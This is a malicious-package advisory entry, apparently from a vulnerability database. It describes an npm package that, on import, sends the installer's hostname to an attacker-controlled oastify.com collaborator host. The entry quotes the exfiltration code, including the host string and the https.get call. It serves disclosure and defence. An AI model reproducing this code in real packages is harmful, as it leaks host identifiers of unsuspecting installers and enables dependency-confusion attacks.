MAL-2026-6122

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (07908d7f0abe458955357ed6814b46c090c70e1b3d34be4dd1a5c02d2507127d) On require(), index.js reads os.hostname(), embeds it as a subdomain label under a Burp Collaborator (oastify.com) host, and issues an https.get to that host (index.js lines 4-7: 'var host = \'api-client.\' + h + \'.200majoeu01dk02xnjdajro1isojc90y.oastify.com\'; https.get({ host: host, path: \'/api-client\', timeout: 4000 },...)'). Both the DNS resolution and the TLS SNI/Host header transmit the installer's hostname out-of-band to an attacker-controlled collaborator subdomain. Although package.json describes the package as a 'Security PoC placeholder - benign, no runtime payload', the shipped code does perform the exfiltration on every consumer that imports the module. The package appears to be a dependency-confusion proof-of-concept against the @onum-releases scope; regardless of intent, installers that pull it leak host identifiers to a third-party OOB server.